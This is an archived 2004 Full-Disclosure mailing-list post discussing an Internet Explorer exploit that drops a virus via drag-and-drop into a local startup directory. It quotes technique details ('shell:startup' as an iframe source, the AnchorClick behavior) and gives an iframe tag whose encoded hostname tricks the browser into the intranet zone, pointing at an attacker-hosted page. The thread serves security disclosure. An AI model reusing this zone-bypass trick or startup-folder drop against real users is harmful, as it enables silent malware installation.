[Full-Disclosure] Virus loading through ActiveX-Exploit [Fwd: George Bush sniper-rifle shot!]
http-equiv@excite.com
1 at malware.com
Thu Sep 9 18:21:05 BST 2004
<!--
> "Alla Bezroutchko" wrote:
> Also interesting that they don't use
> "a {behavior:url(#default#AnchorClick);}"
> in this exploit which seems to be an essential part of http-
equiv's and
> mikx's exploits.
The key to all this exploits is drag'n'drop access to a local
directory.
Since WinXP SP2 it's not possible to use "shell:startup" as src
for an iframe
-->
You also can't or couldn't effect 'drag and drop' from or on the
internet zone into the iframe. That is why the original is by
design on the 'intranet zone' where you can:
<iframe src="http://malware%2F.http-equiv.dyndns.org/~http-
equiv/littleshit.html">
using 'bitlance winter's' magic dns.
--
http://www.malware.com
Full-Disclosure is hosted and sponsored by Secunia.